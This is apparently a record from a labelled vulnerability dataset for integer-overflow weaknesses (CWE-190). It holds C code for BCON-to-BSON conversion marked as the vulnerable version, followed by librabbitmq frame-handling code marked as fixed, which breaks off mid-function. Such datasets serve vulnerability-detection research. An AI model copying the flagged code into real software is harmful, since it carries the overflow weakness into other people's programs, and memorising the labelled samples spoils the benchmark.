bcon_error_t bson_append_bcon_array(bson *b, const bcon *bc);
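/* A typespec token has the form ":Xu:", where X selects how the value was
 * passed ('_' directly, 'R' by reference, 'P' via a pointer-to-pointer whose
 * inner pointer may be NULL, in which case the value is skipped) and u is the
 * value-type character dispatched on in bson_bcon_key_value() below. */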
static bcon_token_t bcon_token(char *s) {
if (s == 0) return Token_EOD;
switch (s[0]) {
case ':': if (s[1] != '\0' && s[2] != '\0' && s[3] != '\0' && s[4] == '\0' &&
s[3] == ':' && (s[1] == '_' || s[1] == 'P' || s[1] == 'R'))
return Token_Typespec; break;
case '{': if (s[1] == '\0') return Token_OpenBrace; break;
case '}': if (s[1] == '\0') return Token_CloseBrace; break;
case '[': if (s[1] == '\0') return Token_OpenBracket; break;
case ']': if (s[1] == '\0') return Token_CloseBracket; break;
case '.': if (s[1] == '\0') return Token_End; break;
}
return Token_Default;
}
static bcon_error_t bson_bcon_key_value(bson *b, const char *key, const char *typespec, const bcon bci) {
bcon_error_t ret = BCON_OK;
bson_oid_t oid;
char ptype = typespec ? typespec[1] : '_';
char utype = typespec ? typespec[2] : '_';
switch (ptype) {
case '_': /* kv(b, key, utype, bci) */
switch (utype) {
case '_': /* fall through */
case 's': bson_append_string( b, key, bci.s ); break; /* common case */
case 'f': bson_append_double( b, key, bci.f ); break;
case 'D':
bson_append_start_object( b, key );
ret = bson_append_bcon( b, bci.D );
bson_append_finish_object( b );
break;
case 'A':
bson_append_start_array( b, key );
ret = bson_append_bcon_array( b, bci.A );
bson_append_finish_array( b );
break;
case 'o': if (*bci.o == '\0') bson_oid_gen( &oid ); else bson_oid_from_string( &oid, bci.o ); bson_append_oid( b, key, &oid ); break;
case 'b': bson_append_bool( b, key, bci.b ); break;
case 't': bson_append_time_t( b, key, bci.t ); break;
case 'v': bson_append_null( b, key ); break; /* void */
case 'x': bson_append_symbol( b, key, bci.x ); break;
case 'i': bson_append_int( b, key, bci.i ); break;
case 'l': bson_append_long( b, key, bci.l ); break;
default: printf("\nptype:'%c' utype:'%c'\n", ptype, utype); assert(NOT_REACHED); break;
}
break;
case 'R': /* krv(b, key, utype, bci) */
switch (utype) {
case 'f': bson_append_double( b, key, *bci.Rf ); break;
case 's': bson_append_string( b, key, bci.Rs ); break;
case 'D':
bson_append_start_object( b, key );
ret = bson_append_bcon( b, bci.RD );
bson_append_finish_object( b );
break;
case 'A':
bson_append_start_array( b, key );
ret = bson_append_bcon_array( b, bci.RA );
bson_append_finish_array( b );
break;
case 'o': if (*bci.o == '\0') bson_oid_gen( &oid ); else bson_oid_from_string( &oid, bci.o ); bson_append_oid( b, key, &oid ); break;
case 'b': bson_append_bool( b, key, *bci.Rb ); break;
case 't': bson_append_time_t( b, key, *bci.Rt ); break;
case 'x': bson_append_symbol( b, key, bci.Rx ); break;
case 'i': bson_append_int( b, key, *bci.Ri ); break;
case 'l': bson_append_long( b, key, *bci.Rl ); break;
default: printf("\nptype:'%c' utype:'%c'\n", ptype, utype); assert(NOT_REACHED); break;
}
break;
case 'P': /* kpv(b, key, utype, bci) */
if (*bci.Pv != 0) {
switch (utype) {
case 'f': bson_append_double( b, key, **bci.Pf ); break;
case 's': bson_append_string( b, key, *bci.Ps ); break;
case 'D':
bson_append_start_object( b, key );
ret = bson_append_bcon( b, *bci.PD );
bson_append_finish_object( b );
break;
case 'A':
bson_append_start_array( b, key );
ret = bson_append_bcon_array( b, *bci.PA );
bson_append_finish_array( b );
break;
case 'o': if (**bci.Po == '\0') bson_oid_gen( &oid );
else bson_oid_from_string( &oid, *bci.Po );
bson_append_oid( b, key, &oid );
break;
case 'b': bson_append_bool( b, key, **bci.Pb ); break;
case 't': bson_append_time_t( b, key, **bci.Pt ); break;
case 'x': if (*bci.Px != 0) bson_append_symbol( b, key, *bci.Px ); break;
case 'i': bson_append_int( b, key, **bci.Pi ); break;
case 'l': bson_append_long( b, key, **bci.Pl ); break;
default: printf("\nptype:'%c' utype:'%c'\n", ptype, utype); assert(NOT_REACHED); break;
}
}
break;
default:
printf("\nptype:'%c' utype:'%c'\n", ptype, utype); assert(NOT_REACHED);
break;
}
return ret;
}
typedef enum bcon_state_t {
State_Element, State_DocSpecValue, State_DocValue,
State_ArraySpecValue, State_ArrayValue
} bcon_state_t;
#define DOC_STACK_SIZE 1024
#define ARRAY_INDEX_STACK_SIZE 1024
#define DOC_PUSH_STATE(return_state) ( doc_stack[doc_stack_pointer++] = (return_state) )
#define DOC_POP_STATE ( state = doc_stack[--doc_stack_pointer] )
#define ARRAY_PUSH_RESET_INDEX_STATE(return_state) ( array_index_stack[array_index_stack_pointer++] = array_index, array_index = 0, DOC_PUSH_STATE(return_state) )
#define ARRAY_POP_INDEX_STATE ( array_index = array_index_stack[--array_index_stack_pointer], DOC_POP_STATE )
#define ARRAY_KEY_STRING(l) (bson_numstr(array_index_buffer, (int)(l)), array_index_buffer)
/*
 * simplified FSM to parse a BCON structure; uses stacks for sub-documents and sub-arrays
*/
static bcon_error_t bson_append_bcon_with_state(bson *b, const bcon *bc, bcon_state_t start_state) {
bcon_error_t ret = BCON_OK;
bcon_state_t state = start_state;
char *key = 0;
char *typespec = 0;
unsigned char doc_stack[DOC_STACK_SIZE];
size_t doc_stack_pointer = 0;
size_t array_index = 0;
unsigned int array_index_stack[ARRAY_INDEX_STACK_SIZE];
size_t array_index_stack_pointer = 0;
char array_index_buffer[ARRAY_INDEX_BUFFER_SIZE]; /* max BSON size */
int end_of_data;
const bcon *bcp;
for (end_of_data = 0, bcp = bc; ret == BCON_OK && !end_of_data; bcp++) {
bcon bci = *bcp;
char *s = bci.s;
switch (state) {
case State_Element:
switch (bcon_token(s)) {
case Token_CloseBrace:
bson_append_finish_object( b );
DOC_POP_STATE; /* state = ...; */
break;
case Token_End:
end_of_data = 1;
break;
default:
key = s;
state = State_DocSpecValue;
break;
}
break;
case State_DocSpecValue:
switch (bcon_token(s)) {
case Token_Typespec:
typespec = s;
state = State_DocValue;
break;
case Token_OpenBrace:
bson_append_start_object( b, key );
DOC_PUSH_STATE(State_Element);
state = State_Element;
break;
case Token_OpenBracket:
bson_append_start_array( b, key );
ARRAY_PUSH_RESET_INDEX_STATE(State_Element);
state = State_ArraySpecValue;
break;
case Token_End:
end_of_data = 1;
break;
default:
ret = bson_bcon_key_value(b, key, typespec, bci);
state = State_Element;
break;
}
break;
case State_DocValue:
ret = bson_bcon_key_value(b, key, typespec, bci);
state = State_Element;
typespec = 0;
break;
case State_ArraySpecValue:
switch (bcon_token(s)) {
case Token_Typespec:
typespec = s;
state = State_ArrayValue;
break;
case Token_OpenBrace:
key = ARRAY_KEY_STRING(array_index++);
bson_append_start_object( b, key );
DOC_PUSH_STATE(State_ArraySpecValue);
state = State_Element;
break;
case Token_OpenBracket:
key = ARRAY_KEY_STRING(array_index++);
bson_append_start_array( b, key );
ARRAY_PUSH_RESET_INDEX_STATE(State_ArraySpecValue);
/* state = State_ArraySpecValue; */
break;
case Token_CloseBracket:
bson_append_finish_array( b );
ARRAY_POP_INDEX_STATE; /* state = ...; */
break;
case Token_End:
end_of_data = 1;
break;
default:
key = ARRAY_KEY_STRING(array_index++);
ret = bson_bcon_key_value(b, key, typespec, bci);
/* state = State_ArraySpecValue; */
break;
}
break;
case State_ArrayValue:
key = ARRAY_KEY_STRING(array_index++);
ret = bson_bcon_key_value(b, key, typespec, bci);
state = State_ArraySpecValue;
typespec = 0;
break;
default: assert(NOT_REACHED); break;
}
}
return state == start_state ? BCON_OK : BCON_DOCUMENT_INCOMPLETE;
}
bcon_error_t bson_append_bcon(bson *b, const bcon *bc) {
return bson_append_bcon_with_state(b, bc, State_Element);
}
bcon_error_t bson_append_bcon_array(bson *b, const bcon *bc) {
return bson_append_bcon_with_state(b, bc, State_ArraySpecValue);
}
/**
* Generate BSON from BCON
* @param b a BSON object
* @param bc a BCON object
 * @note bson_init is called on b; on success the result should be paired with bson_destroy
*/
bcon_error_t bson_from_bcon(bson *b, const bcon *bc) {
bcon_error_t ret = BSON_OK;
bson_init( b );
ret = bson_append_bcon_with_state( b, bc, State_Element );
if (ret != BCON_OK) return ret;
ret = bson_finish( b );
return ( ret == BSON_OK ? BCON_OK : BCON_BSON_ERROR );
}
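/*
 * Hypothetical usage sketch (not part of the original file): builds a
 * document with two string fields from a BCON array. Only the default
 * string case is exercised, so no ":_x:" typespec tokens are needed;
 * "." is the end-of-data token recognized by bcon_token() above, and the
 * resulting bson is paired with bson_destroy as noted above. The function
 * name is illustrative only.
 */
static void bcon_usage_example(void) {
    bson b;
    bcon doc[] = {
        { .s = "name" }, { .s = "pi" },
        { .s = "kind" }, { .s = "constant" },
        { .s = "." } /* Token_End */
    };
    if (bson_from_bcon( &b, doc ) == BCON_OK) {
        /* ... use b ... */
        bson_destroy( &b );
    }
}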
void bcon_print(const bcon *bc) { /* prints internal representation, not JSON */
char *typespec = 0;
char *delim = "";
int end_of_data;
bcon *bcp;
putchar('{');
for (end_of_data = 0, bcp = (bcon*)bc; !end_of_data; bcp++) {
bcon bci = *bcp;
char *typespec_next = 0;
if (typespec) {
switch (typespec[1]) {
case '_':
switch (typespec[2]) {
case 'f': printf("%s%f", delim, bci.f); break;
case 's': printf("%s\"%s\"", delim, bci.s); break;
case 'D': printf("%sPD(0x%lx,..)", delim, (unsigned long)bci.D); break;
case 'A': printf("%sPA(0x%lx,....)", delim, (unsigned long)bci.A); break;
case 'o': printf("%s\"%s\"", delim, bci.o); break;
case 'b': printf("%s%d", delim, bci.b); break;
case 't': printf("%s%ld", delim, (long)bci.t); break;
case 'v': printf("%s\"%s\"", delim, bci.v); break;
case 'x': printf("%s\"%s\"", delim, bci.x); break;
case 'i': printf("%s%d", delim, bci.i); break;
case 'l': printf("%s%ld", delim, bci.l); break;
default: printf("\ntypespec:\"%s\"\n", typespec); assert(NOT_REACHED); break;
}
break;
case 'R':
switch (typespec[2]) {
case 'f': printf("%sRf(0x%lx,%f)", delim, (unsigned long)bci.Rf, *bci.Rf); break;
case 's': printf("%sRs(0x%lx,\"%s\")", delim, (unsigned long)bci.Rs, bci.Rs); break;
case 'D': printf("%sRD(0x%lx,..)", delim, (unsigned long)bci.RD); break;
case 'A': printf("%sRA(0x%lx,....)", delim, (unsigned long)bci.RA); break;
case 'o': printf("%sRo(0x%lx,\"%s\")", delim, (unsigned long)bci.Ro, bci.Ro); break;
case 'b': printf("%sRb(0x%lx,%d)", delim, (unsigned long)bci.Rb, *bci.Rb); break;
case 't': printf("%sRt(0x%lx,%ld)", delim, (unsigned long)bci.Rt, (long)*bci.Rt); break;
case 'x': printf("%sRx(0x%lx,\"%s\")", delim, (unsigned long)bci.Rx, bci.Rx); break;
case 'i': printf("%sRi(0x%lx,%d)", delim, (unsigned long)bci.Ri, *bci.Ri); break;
case 'l': printf("%sRl(0x%lx,%ld)", delim, (unsigned long)bci.Rl, *bci.Rl); break;
default: printf("\ntypespec:\"%s\"\n", typespec); assert(NOT_REACHED); break;
}
break;
case 'P':
switch (typespec[2]) {
case 'f': printf("%sPf(0x%lx,0x%lx,%f)", delim, (unsigned long)bci.Pf, (unsigned long)(bci.Pf ? *bci.Pf : 0), bci.Pf && *bci.Pf ? **bci.Pf : 0.0); break;
case 's': printf("%sPs(0x%lx,0x%lx,\"%s\")", delim, (unsigned long)bci.Ps, (unsigned long)(bci.Ps ? *bci.Ps : 0), bci.Ps && *bci.Ps ? *bci.Ps : ""); break;
case 'D': printf("%sPD(0x%lx,0x%lx,..)", delim, (unsigned long)bci.PD, (unsigned long)(bci.PD ? *bci.PD : 0)); break;
case 'A': printf("%sPA(0x%lx,0x%lx,....)", delim, (unsigned long)bci.PA, (unsigned long)(bci.PA ? *bci.PA : 0)); break;
case 'o': printf("%sPo(0x%lx,0x%lx,\"%s\")", delim, (unsigned long)bci.Po, (unsigned long)(bci.Po ? *bci.Po : 0), bci.Po && *bci.Po ? *bci.Po : ""); break;
case 'b': printf("%sPb(0x%lx,0x%lx,%d)", delim, (unsigned long)bci.Pb, (unsigned long)(bci.Pb ? *bci.Pb : 0), bci.Pb && *bci.Pb ? **bci.Pb : 0); break;
case 't': printf("%sPt(0x%lx,0x%lx,%ld)", delim, (unsigned long)bci.Pt, (unsigned long)(bci.Pt ? *bci.Pt : 0), bci.Pt && *bci.Pt ? (long)**bci.Pt : 0); break;
case 'x': printf("%sPx(0x%lx,0x%lx,\"%s\")", delim, (unsigned long)bci.Px, (unsigned long)(bci.Px ? *bci.Px : 0), bci.Px && *bci.Px ? *bci.Px : ""); break;
case 'i': printf("%sPi(0x%lx,0x%lx,%d)", delim, (unsigned long)bci.Pi, (unsigned long)(bci.Pi ? *bci.Pi : 0), bci.Pi && *bci.Pi ? **bci.Pi : 0); break;
case 'l': printf("%sPl(0x%lx,0x%lx,%ld)", delim, (unsigned long)bci.Pl, (unsigned long)(bci.Pl ? *bci.Pl : 0), bci.Pl && *bci.Pl ? **bci.Pl : 0); break;
default: printf("\ntypespec:\"%s\"\n", typespec); assert(NOT_REACHED); break;
}
break;
default:
printf("\ntypespec:\"%s\"\n", typespec); assert(NOT_REACHED);
break;
}
}
else {
char *s = bci.s;
switch (s[0]) {
case '.':
end_of_data = (s[1] == '\0');
break;
case ':':
typespec_next = bcon_token(s) == Token_Typespec ? s : 0;
break;
}
printf("%s\"%s\"", delim, s);
}
typespec = typespec_next;
delim = ",";
}
putchar('}');
}
/* TODO - incomplete */
static void bcon_json_print(bcon *bc, int n) {
int t = 0;
int key_value_count = 0;
char *s;
int end_of_data;
bcon *bcp;
putchar('{');
for (end_of_data = 0, bcp = bc; !end_of_data; bcp++) {
bcon bci = *bcp;
switch (t) {
case 'l':
if (key_value_count & 0x1) putchar(':');
printf("%ld", bci.l);
t = 0;
key_value_count++;
break;
case 's': /* fall through */
default:
s = bci.s;
switch (*s) {
case ':':
++s;
t = *++s;
break;
case '{':
if (key_value_count & 0x1) putchar(':');
putchar(*s);
key_value_count = 0;
break;
case '}':
putchar(*s);
key_value_count = 2;
break;
default:
if (key_value_count & 0x1) putchar(':');
else if (key_value_count > 1) putchar(',');
printf("\"%s\"", s);
t = 0;
key_value_count++;
break;
}
break;
}
}
putchar('}');
}
| ./CrossVul/dataset_final_sorted/CWE-190/c/bad_3983_0 |
crossvul-cpp_data_good_1203_0 | /*
* ***** BEGIN LICENSE BLOCK *****
* Version: MIT
*
* Portions created by Alan Antonuk are Copyright (c) 2012-2014
* Alan Antonuk. All Rights Reserved.
*
* Portions created by VMware are Copyright (c) 2007-2012 VMware, Inc.
* All Rights Reserved.
*
* Portions created by Tony Garnock-Jones are Copyright (c) 2009-2010
* VMware, Inc. and Tony Garnock-Jones. All Rights Reserved.
*
* Permission is hereby granted, free of charge, to any person
* obtaining a copy of this software and associated documentation
* files (the "Software"), to deal in the Software without
* restriction, including without limitation the rights to use, copy,
* modify, merge, publish, distribute, sublicense, and/or sell copies
* of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be
* included in all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
* EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
* MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
* NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
* BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
* ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
* CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
* SOFTWARE.
* ***** END LICENSE BLOCK *****
*/
#ifdef HAVE_CONFIG_H
#include "config.h"
#endif
#ifdef _MSC_VER
#define _CRT_SECURE_NO_WARNINGS
#endif
#include "amqp_private.h"
#include "amqp_tcp_socket.h"
#include "amqp_time.h"
#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#ifndef AMQP_INITIAL_FRAME_POOL_PAGE_SIZE
#define AMQP_INITIAL_FRAME_POOL_PAGE_SIZE 65536
#endif
#ifndef AMQP_INITIAL_INBOUND_SOCK_BUFFER_SIZE
#define AMQP_INITIAL_INBOUND_SOCK_BUFFER_SIZE 131072
#endif
#ifndef AMQP_DEFAULT_LOGIN_TIMEOUT_SEC
#define AMQP_DEFAULT_LOGIN_TIMEOUT_SEC 12
#endif
#define ENFORCE_STATE(statevec, statenum) \
{ \
amqp_connection_state_t _check_state = (statevec); \
amqp_connection_state_enum _wanted_state = (statenum); \
if (_check_state->state != _wanted_state) \
amqp_abort( \
"Programming error: invalid AMQP connection state: expected %d, " \
"got %d", \
_wanted_state, _check_state->state); \
}
amqp_connection_state_t amqp_new_connection(void) {
int res;
amqp_connection_state_t state = (amqp_connection_state_t)calloc(
1, sizeof(struct amqp_connection_state_t_));
if (state == NULL) {
return NULL;
}
res = amqp_tune_connection(state, 0, AMQP_INITIAL_FRAME_POOL_PAGE_SIZE, 0);
if (0 != res) {
goto out_nomem;
}
state->inbound_buffer.bytes = state->header_buffer;
state->inbound_buffer.len = sizeof(state->header_buffer);
state->state = CONNECTION_STATE_INITIAL;
/* the server protocol version response is 8 bytes, which conveniently
is also the minimum frame size */
state->target_size = 8;
state->sock_inbound_buffer.len = AMQP_INITIAL_INBOUND_SOCK_BUFFER_SIZE;
state->sock_inbound_buffer.bytes =
malloc(AMQP_INITIAL_INBOUND_SOCK_BUFFER_SIZE);
if (state->sock_inbound_buffer.bytes == NULL) {
goto out_nomem;
}
init_amqp_pool(&state->properties_pool, 512);
/* Use address of the internal_handshake_timeout object by default. */
state->internal_handshake_timeout.tv_sec = AMQP_DEFAULT_LOGIN_TIMEOUT_SEC;
state->internal_handshake_timeout.tv_usec = 0;
state->handshake_timeout = &state->internal_handshake_timeout;
return state;
out_nomem:
free(state->sock_inbound_buffer.bytes);
free(state);
return NULL;
}
int amqp_get_sockfd(amqp_connection_state_t state) {
return state->socket ? amqp_socket_get_sockfd(state->socket) : -1;
}
void amqp_set_sockfd(amqp_connection_state_t state, int sockfd) {
amqp_socket_t *socket = amqp_tcp_socket_new(state);
if (!socket) {
amqp_abort("%s", strerror(errno));
}
amqp_tcp_socket_set_sockfd(socket, sockfd);
}
void amqp_set_socket(amqp_connection_state_t state, amqp_socket_t *socket) {
amqp_socket_delete(state->socket);
state->socket = socket;
}
amqp_socket_t *amqp_get_socket(amqp_connection_state_t state) {
return state->socket;
}
int amqp_tune_connection(amqp_connection_state_t state, int channel_max,
int frame_max, int heartbeat) {
void *newbuf;
int res;
ENFORCE_STATE(state, CONNECTION_STATE_IDLE);
state->channel_max = channel_max;
state->frame_max = frame_max;
state->heartbeat = heartbeat;
if (0 > state->heartbeat) {
state->heartbeat = 0;
}
res = amqp_time_s_from_now(&state->next_send_heartbeat,
amqp_heartbeat_send(state));
if (AMQP_STATUS_OK != res) {
return res;
}
res = amqp_time_s_from_now(&state->next_recv_heartbeat,
amqp_heartbeat_recv(state));
if (AMQP_STATUS_OK != res) {
return res;
}
state->outbound_buffer.len = frame_max;
newbuf = realloc(state->outbound_buffer.bytes, frame_max);
if (newbuf == NULL) {
return AMQP_STATUS_NO_MEMORY;
}
state->outbound_buffer.bytes = newbuf;
return AMQP_STATUS_OK;
}
int amqp_get_channel_max(amqp_connection_state_t state) {
return state->channel_max;
}
int amqp_get_frame_max(amqp_connection_state_t state) {
return state->frame_max;
}
int amqp_get_heartbeat(amqp_connection_state_t state) {
return state->heartbeat;
}
int amqp_destroy_connection(amqp_connection_state_t state) {
int status = AMQP_STATUS_OK;
if (state) {
int i;
for (i = 0; i < POOL_TABLE_SIZE; ++i) {
amqp_pool_table_entry_t *entry = state->pool_table[i];
while (NULL != entry) {
amqp_pool_table_entry_t *todelete = entry;
empty_amqp_pool(&entry->pool);
entry = entry->next;
free(todelete);
}
}
free(state->outbound_buffer.bytes);
free(state->sock_inbound_buffer.bytes);
amqp_socket_delete(state->socket);
empty_amqp_pool(&state->properties_pool);
free(state);
}
return status;
}
static void return_to_idle(amqp_connection_state_t state) {
state->inbound_buffer.len = sizeof(state->header_buffer);
state->inbound_buffer.bytes = state->header_buffer;
state->inbound_offset = 0;
state->target_size = HEADER_SIZE;
state->state = CONNECTION_STATE_IDLE;
}
static size_t consume_data(amqp_connection_state_t state,
amqp_bytes_t *received_data) {
/* how much data is available and will fit? */
size_t bytes_consumed = state->target_size - state->inbound_offset;
if (received_data->len < bytes_consumed) {
bytes_consumed = received_data->len;
}
memcpy(amqp_offset(state->inbound_buffer.bytes, state->inbound_offset),
received_data->bytes, bytes_consumed);
state->inbound_offset += bytes_consumed;
received_data->bytes = amqp_offset(received_data->bytes, bytes_consumed);
received_data->len -= bytes_consumed;
return bytes_consumed;
}
int amqp_handle_input(amqp_connection_state_t state, amqp_bytes_t received_data,
amqp_frame_t *decoded_frame) {
size_t bytes_consumed;
void *raw_frame;
  /* Returning frame_type of zero indicates either insufficient input
     or that a complete, ignored frame was read. */
decoded_frame->frame_type = 0;
if (received_data.len == 0) {
return AMQP_STATUS_OK;
}
if (state->state == CONNECTION_STATE_IDLE) {
state->state = CONNECTION_STATE_HEADER;
}
bytes_consumed = consume_data(state, &received_data);
/* do we have target_size data yet? if not, return with the
expectation that more will arrive */
if (state->inbound_offset < state->target_size) {
return (int)bytes_consumed;
}
raw_frame = state->inbound_buffer.bytes;
switch (state->state) {
case CONNECTION_STATE_INITIAL:
/* check for a protocol header from the server */
if (memcmp(raw_frame, "AMQP", 4) == 0) {
decoded_frame->frame_type = AMQP_PSEUDOFRAME_PROTOCOL_HEADER;
decoded_frame->channel = 0;
decoded_frame->payload.protocol_header.transport_high =
amqp_d8(amqp_offset(raw_frame, 4));
decoded_frame->payload.protocol_header.transport_low =
amqp_d8(amqp_offset(raw_frame, 5));
decoded_frame->payload.protocol_header.protocol_version_major =
amqp_d8(amqp_offset(raw_frame, 6));
decoded_frame->payload.protocol_header.protocol_version_minor =
amqp_d8(amqp_offset(raw_frame, 7));
return_to_idle(state);
return (int)bytes_consumed;
}
/* it's not a protocol header; fall through to process it as a
regular frame header */
case CONNECTION_STATE_HEADER: {
amqp_channel_t channel;
amqp_pool_t *channel_pool;
uint32_t frame_size;
channel = amqp_d16(amqp_offset(raw_frame, 1));
/* frame length is 3 bytes in */
frame_size = amqp_d32(amqp_offset(raw_frame, 3));
/* To prevent the target_size calculation below from overflowing, check
* that the stated frame_size is smaller than a signed 32-bit. Given
* the library only allows configuring frame_max as an int32_t, and
* frame_size is uint32_t, the math below is safe from overflow. */
if (frame_size >= INT32_MAX) {
return AMQP_STATUS_BAD_AMQP_DATA;
}
state->target_size = frame_size + HEADER_SIZE + FOOTER_SIZE;
if ((size_t)state->frame_max < state->target_size) {
return AMQP_STATUS_BAD_AMQP_DATA;
}
channel_pool = amqp_get_or_create_channel_pool(state, channel);
if (NULL == channel_pool) {
return AMQP_STATUS_NO_MEMORY;
}
amqp_pool_alloc_bytes(channel_pool, state->target_size,
&state->inbound_buffer);
if (NULL == state->inbound_buffer.bytes) {
return AMQP_STATUS_NO_MEMORY;
}
memcpy(state->inbound_buffer.bytes, state->header_buffer, HEADER_SIZE);
raw_frame = state->inbound_buffer.bytes;
state->state = CONNECTION_STATE_BODY;
bytes_consumed += consume_data(state, &received_data);
/* do we have target_size data yet? if not, return with the
expectation that more will arrive */
if (state->inbound_offset < state->target_size) {
return (int)bytes_consumed;
}
}
/* fall through to process body */
case CONNECTION_STATE_BODY: {
amqp_bytes_t encoded;
int res;
amqp_pool_t *channel_pool;
/* Check frame end marker (footer) */
if (amqp_d8(amqp_offset(raw_frame, state->target_size - 1)) !=
AMQP_FRAME_END) {
return AMQP_STATUS_BAD_AMQP_DATA;
}
decoded_frame->frame_type = amqp_d8(amqp_offset(raw_frame, 0));
decoded_frame->channel = amqp_d16(amqp_offset(raw_frame, 1));
channel_pool =
amqp_get_or_create_channel_pool(state, decoded_frame->channel);
if (NULL == channel_pool) {
return AMQP_STATUS_NO_MEMORY;
}
switch (decoded_frame->frame_type) {
case AMQP_FRAME_METHOD:
decoded_frame->payload.method.id =
amqp_d32(amqp_offset(raw_frame, HEADER_SIZE));
encoded.bytes = amqp_offset(raw_frame, HEADER_SIZE + 4);
encoded.len = state->target_size - HEADER_SIZE - 4 - FOOTER_SIZE;
res = amqp_decode_method(decoded_frame->payload.method.id,
channel_pool, encoded,
&decoded_frame->payload.method.decoded);
if (res < 0) {
return res;
}
break;
case AMQP_FRAME_HEADER:
decoded_frame->payload.properties.class_id =
amqp_d16(amqp_offset(raw_frame, HEADER_SIZE));
/* unused 2-byte weight field goes here */
decoded_frame->payload.properties.body_size =
amqp_d64(amqp_offset(raw_frame, HEADER_SIZE + 4));
encoded.bytes = amqp_offset(raw_frame, HEADER_SIZE + 12);
encoded.len = state->target_size - HEADER_SIZE - 12 - FOOTER_SIZE;
decoded_frame->payload.properties.raw = encoded;
res = amqp_decode_properties(
decoded_frame->payload.properties.class_id, channel_pool, encoded,
&decoded_frame->payload.properties.decoded);
if (res < 0) {
return res;
}
break;
case AMQP_FRAME_BODY:
decoded_frame->payload.body_fragment.len =
state->target_size - HEADER_SIZE - FOOTER_SIZE;
decoded_frame->payload.body_fragment.bytes =
amqp_offset(raw_frame, HEADER_SIZE);
break;
case AMQP_FRAME_HEARTBEAT:
break;
default:
/* Ignore the frame */
decoded_frame->frame_type = 0;
break;
}
return_to_idle(state);
return (int)bytes_consumed;
}
default:
amqp_abort("Internal error: invalid amqp_connection_state_t->state %d",
state->state);
}
}
amqp_boolean_t amqp_release_buffers_ok(amqp_connection_state_t state) {
return (state->state == CONNECTION_STATE_IDLE);
}
void amqp_release_buffers(amqp_connection_state_t state) {
int i;
ENFORCE_STATE(state, CONNECTION_STATE_IDLE);
for (i = 0; i < POOL_TABLE_SIZE; ++i) {
amqp_pool_table_entry_t *entry = state->pool_table[i];
for (; NULL != entry; entry = entry->next) {
amqp_maybe_release_buffers_on_channel(state, entry->channel);
}
}
}
void amqp_maybe_release_buffers(amqp_connection_state_t state) {
if (amqp_release_buffers_ok(state)) {
amqp_release_buffers(state);
}
}
void amqp_maybe_release_buffers_on_channel(amqp_connection_state_t state,
amqp_channel_t channel) {
amqp_link_t *queued_link;
amqp_pool_t *pool;
if (CONNECTION_STATE_IDLE != state->state) {
return;
}
queued_link = state->first_queued_frame;
while (NULL != queued_link) {
amqp_frame_t *frame = queued_link->data;
if (channel == frame->channel) {
return;
}
queued_link = queued_link->next;
}
pool = amqp_get_channel_pool(state, channel);
if (pool != NULL) {
recycle_amqp_pool(pool);
}
}
static int amqp_frame_to_bytes(const amqp_frame_t *frame, amqp_bytes_t buffer,
amqp_bytes_t *encoded) {
void *out_frame = buffer.bytes;
size_t out_frame_len;
int res;
amqp_e8(frame->frame_type, amqp_offset(out_frame, 0));
amqp_e16(frame->channel, amqp_offset(out_frame, 1));
switch (frame->frame_type) {
case AMQP_FRAME_BODY: {
const amqp_bytes_t *body = &frame->payload.body_fragment;
memcpy(amqp_offset(out_frame, HEADER_SIZE), body->bytes, body->len);
out_frame_len = body->len;
break;
}
case AMQP_FRAME_METHOD: {
amqp_bytes_t method_encoded;
amqp_e32(frame->payload.method.id, amqp_offset(out_frame, HEADER_SIZE));
method_encoded.bytes = amqp_offset(out_frame, HEADER_SIZE + 4);
method_encoded.len = buffer.len - HEADER_SIZE - 4 - FOOTER_SIZE;
res = amqp_encode_method(frame->payload.method.id,
frame->payload.method.decoded, method_encoded);
if (res < 0) {
return res;
}
out_frame_len = res + 4;
break;
}
case AMQP_FRAME_HEADER: {
amqp_bytes_t properties_encoded;
amqp_e16(frame->payload.properties.class_id,
amqp_offset(out_frame, HEADER_SIZE));
amqp_e16(0, amqp_offset(out_frame, HEADER_SIZE + 2)); /* "weight" */
amqp_e64(frame->payload.properties.body_size,
amqp_offset(out_frame, HEADER_SIZE + 4));
properties_encoded.bytes = amqp_offset(out_frame, HEADER_SIZE + 12);
properties_encoded.len = buffer.len - HEADER_SIZE - 12 - FOOTER_SIZE;
res = amqp_encode_properties(frame->payload.properties.class_id,
frame->payload.properties.decoded,
properties_encoded);
if (res < 0) {
return res;
}
out_frame_len = res + 12;
break;
}
case AMQP_FRAME_HEARTBEAT:
out_frame_len = 0;
break;
default:
return AMQP_STATUS_INVALID_PARAMETER;
}
amqp_e32((uint32_t)out_frame_len, amqp_offset(out_frame, 3));
amqp_e8(AMQP_FRAME_END, amqp_offset(out_frame, HEADER_SIZE + out_frame_len));
encoded->bytes = out_frame;
encoded->len = out_frame_len + HEADER_SIZE + FOOTER_SIZE;
return AMQP_STATUS_OK;
}
int amqp_send_frame(amqp_connection_state_t state, const amqp_frame_t *frame) {
return amqp_send_frame_inner(state, frame, AMQP_SF_NONE,
amqp_time_infinite());
}
int amqp_send_frame_inner(amqp_connection_state_t state,
const amqp_frame_t *frame, int flags,
amqp_time_t deadline) {
int res;
ssize_t sent;
amqp_bytes_t encoded;
amqp_time_t next_timeout;
/* TODO: if the AMQP_SF_MORE socket optimization can be shown to work
* correctly, then this could be un-done so that body-frames are sent as 3
   * send calls, getting rid of the copy of the body content. Some testing
   * would be needed to see whether this is actually a win for performance.
   */
res = amqp_frame_to_bytes(frame, state->outbound_buffer, &encoded);
if (AMQP_STATUS_OK != res) {
return res;
}
start_send:
next_timeout = amqp_time_first(deadline, state->next_recv_heartbeat);
sent = amqp_try_send(state, encoded.bytes, encoded.len, next_timeout, flags);
if (0 > sent) {
return (int)sent;
}
  /* A partial send has occurred, either because of a heartbeat deadline (so
   * try to receive something) or because of the caller's timeout (so return
   * AMQP_STATUS_TIMEOUT). */
